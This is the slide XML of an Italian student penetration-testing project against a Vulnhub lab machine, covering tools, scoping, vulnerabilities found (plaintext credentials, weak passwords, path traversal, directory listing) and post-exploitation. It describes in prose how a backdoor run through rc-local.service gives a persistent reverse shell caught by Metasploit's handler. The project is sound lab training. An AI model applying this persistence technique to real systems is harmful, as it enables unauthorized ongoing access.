              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>rc-local.service</a:t>
            </a:r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F49BAA-717B-A872-630C-BF229DDA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45" y="2465493"/>
            <a:ext cx="7128809" cy="168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558465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Strumenti Utilizzati</a:t>
            </a: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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a: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545274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BD45CEF-2200-EB43-B9D0-693B4B7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9525"/>
            <a:ext cx="7981950" cy="478200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Post Exploitation – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Mantaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Access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9A38D61-C314-37BF-4277-654E8567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81268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Ora che il servizio è abilitato questo verrà eseguito ad ogni avvio del sistema. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Per confermare il funzionamento ci mettiamo in ascolto della «reverse shell» con il modulo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> fornito dal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> framework.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B895E5-D0BA-715F-73C2-98F941FB0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075595"/>
            <a:ext cx="5499947" cy="2097654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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630D6571-5327-56FF-34E6-0966E1905772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594692" y="4173249"/>
            <a:ext cx="7717500" cy="81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39700" indent="0">
              <a:buFont typeface="Source Sans Pro"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Nell’utilizzo del modulo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> vanno specificati gli stessi parametri utilizzati nella creazione della backdoor, in special modo per il payload da utilizzare.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161938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BD45CEF-2200-EB43-B9D0-693B4B7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9525"/>
            <a:ext cx="7981950" cy="478200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Post Exploitation – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Mantaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Access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9A38D61-C314-37BF-4277-654E85671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7717500" cy="81268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Riavviando la macchina target possiamo vedere che viene instaurata una connessione dalla macchina target alla nostra macchina con reverse shell verso il nostro modulo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, ottenendo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>accesso persistente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/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2DAF7E-4CA1-783C-298A-B768A9D9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2192955"/>
            <a:ext cx="7648674" cy="132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28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BD45CEF-2200-EB43-B9D0-693B4B7FB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9525"/>
            <a:ext cx="7981950" cy="478200"/>
          </a:xfrm>
        </p:spPr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3A71DB-177F-79B5-DAFF-04AB39C85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 dirty="0"/>
              <a:t>Le vulnerabilità riscontrate più gravi sono:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Presenza di credenziali in chiaro - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CWE-256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Plaintext Storage of a Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Password deboli - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CWE-1391</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Use of Weak Credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Le principali debolezze che ci hanno portato allo sfruttamento di queste </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerabilià</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> sono:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p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Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CWE-22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Improper Limitation of a Pathname to a Restricted Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directory Listing - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CWE-548</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exposure of Information Through Directory Listing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="13970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473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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2832750" y="621225"/>
            <a:ext cx="34785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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3450" name="Google Shape;3450;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2939100" y="1481620"/>
            <a:ext cx="3265800" cy="135300"/>
            <a:chOff x="2939100" y="1481620"/>
            <a:chExt cx="3265800" cy="135300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="3451" name="Google Shape;3451;p74"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="3452" idx="6"/>
              <a:endCxn id="3453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452" name="Google Shape;3452;p74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="29391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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="60696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54" name="Google Shape;3454;p74"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="3452" idx="6"/>
              <a:endCxn id="3453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6" name="Google Shape;3440;p74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D01167E-A8C5-A2A1-4415-A0232144BA12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2008293" y="2322862"/>
            <a:ext cx="5127414" cy="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 b="1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r>
              <a:rPr lang="it-IT" dirty="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401731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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97BCB2D9-AE1C-1397-46B3-6800AA5C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utilizzati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B979B1A2-164D-B8EA-C1CB-0CA455AF5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99000"/>
            <a:ext cx="6360675" cy="3369900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>La macchina da analizzare è stata scelta dal sito </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnhub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>È stato utilizzato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>virtualbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> come software di virtualizzazione e sono state virtualizzate due macchine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Macchina «attaccante» con sistema operativo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Macchina «target»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Rete NAT con il quale si è fatto comunicare le due macchine.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Come installare Oracle Virtualbox – valent">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C048DAD7-6075-A9CD-D80D-6990E784B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49" y="193675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CBE985F-12E9-EA78-1CCC-A543A0871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3703637"/>
            <a:ext cx="3429000" cy="1152525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="Vulnhub-Mercy. Hello everyone I hope you are doing… | by ARZ101 | Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8F143C5-6167-6627-5203-7B2789F2F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49" y="1017725"/>
            <a:ext cx="102931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6FD6D6-BE07-DE0E-E319-9AAB1DAD4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107" y="3487600"/>
            <a:ext cx="1738942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547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E59721-BE32-6EDD-310A-960BB7E37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Utilizzati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ABF219-2E6C-CD6A-DDB1-5B3AE68EB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026" name="Picture 2" descr="Nmap Commands Cheatsheet - App su Google Play">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A5D583E-5653-0F03-095C-1A898544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38" y="119900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673FE14-D186-116E-062B-4A3F1336D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02" y="1234378"/>
            <a:ext cx="1080000" cy="108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0C914E1-CCA2-97C9-8CE7-5148F2BC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558" y="1207099"/>
            <a:ext cx="1920000" cy="1080000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1050" name="Picture 26" descr="WhatWeb - MorningStar Security">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{651B3E00-2ADE-84E7-E513-2B6F99F5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82" y="1248639"/>
            <a:ext cx="224415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7D20C72-CF72-B494-9D0C-7E9924882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453" y="2365103"/>
            <a:ext cx="1080000" cy="108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0FAFE6A-1D74-8290-07FA-636F758D5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6042" y="2407303"/>
            <a:ext cx="1080000" cy="1080000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1056" name="Picture 32" descr="OWASP ZAP · GitHub">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2F6750C-81E2-5FA7-DB67-83FA86C0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667" y="23439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OpenVAS Terms to Know | SecurityOrb.com">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EC62798-B448-8FFC-FA9B-BC1D7225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38" y="3615606"/>
            <a:ext cx="285758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175A9B1C-1710-B64D-D296-8F1AEE04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129" y="3538028"/>
            <a:ext cx="383526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nstall The Metasploit Framework on Pop!_OS using the Snap Store | Snapcraft">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBB9942E-CEBD-9B04-B602-8A3D79EBD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30" y="240730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01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558465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Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Scoping</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/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“Scope” di cosa è stato analizzato</a:t>
            </a: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2510683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AEA25A0E-F047-47A3-AF7D-24B4BE07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Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Scoping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DFA562-36EF-966E-BCFB-4C6B83092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800" dirty="0"/>
              <a:t>Scope dell’analisi circoscritto alla sola macchina virtuale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0"/>
              <a:t>MHZ_CXF: C1F </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t>Testing di tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0"/>
              <a:t>Black box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t>Produzione di un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0"/>
              <a:t> Testing Report </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t>in cui vi sono elencate le vulnerabilità riscontrate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41991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1673400" y="2393070"/>
            <a:ext cx="63276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Recupero di informazioni riguardo la macchina analizzata</a:t>
            </a:r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636063168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1547</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Presentazione su schermo (16:9)</PresentationFormat>
  <Paragraphs>207</Paragraphs>
  <Slides>43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8" baseType="lpstr">
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>Source Sans Pro SemiBold</vt:lpstr>
      <vt:lpstr>Play</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Computer Science &amp; Mathematics Major For College: Computer Science &amp; Programming by Slidesgo</vt:lpstr>
      <vt:lpstr>Progetto  Penetration Testing &amp; Ethical Hacking Analisi della macchina MHZ_CXF: C1F </vt:lpstr>
      <vt:lpstr>TABLE OF CONTENTS</vt:lpstr>
      <vt:lpstr>TABLE OF CONTENTS</vt:lpstr>
      <vt:lpstr>Strumenti Utilizzati</vt:lpstr>
      <vt:lpstr>Strumenti utilizzati</vt:lpstr>
      <vt:lpstr>Strumenti Utilizzati</vt:lpstr>
      <vt:lpstr>Target Scoping</vt:lpstr>
      <vt:lpstr>Target Scoping</vt:lpstr>
      <vt:lpstr>Information gathering</vt:lpstr>
      <vt:lpstr>Information gathering </vt:lpstr>
      <vt:lpstr>Target Discovery</vt:lpstr>
      <vt:lpstr>Target Discovery – Ping Scan </vt:lpstr>
      <vt:lpstr>Target Discovery – OS Fingerprinting</vt:lpstr>
      <vt:lpstr>Enumerating Target</vt:lpstr>
      <vt:lpstr>Enumerating Target</vt:lpstr>
      <vt:lpstr>Enumerating Target</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping </vt:lpstr>
      <vt:lpstr>Vulnerability Mapping</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping - File e Directory Listing  </vt:lpstr>
      <vt:lpstr>Vulnerability Mapping - File e Directory Listing  </vt:lpstr>
      <vt:lpstr>Vulnerability Mapping - File e Directory Listing  </vt:lpstr>
      <vt:lpstr>Vulnerability Mapping - File e Directory Listing  </vt:lpstr>
      <vt:lpstr>Vulnerability Mapping - File e Directory Listing  </vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Post Exploitation</vt:lpstr>
      <vt:lpstr>Post Exploitation – Privilege Escalation</vt:lpstr>
      <vt:lpstr>Post Exploitation – Mantaining Access</vt:lpstr>
      <vt:lpstr>Post Exploitation – Mantaining Access</vt:lpstr>
      <vt:lpstr>Post Exploitation – Mantaining Access</vt:lpstr>
      <vt:lpstr>Post Exploitation – Mantaining Access</vt:lpstr>
      <vt:lpstr>Post Exploitation – Mantaining Access</vt:lpstr>
      <vt:lpstr>Post Exploitation – Mantaining Access</vt:lpstr>
      <vt:lpstr>Conclusioni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 Penetration Testing &amp; Ethical Hacking Analisi della macchina MHZ_CXF: C1F</dc:title>
  <dc:creator>Antonio</dc:creator>
  <cp:lastModifiedBy>ANTONIO BALDI</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-05T19:29:21Z</dcterms:modified>
</cp:coreProperties>
</file>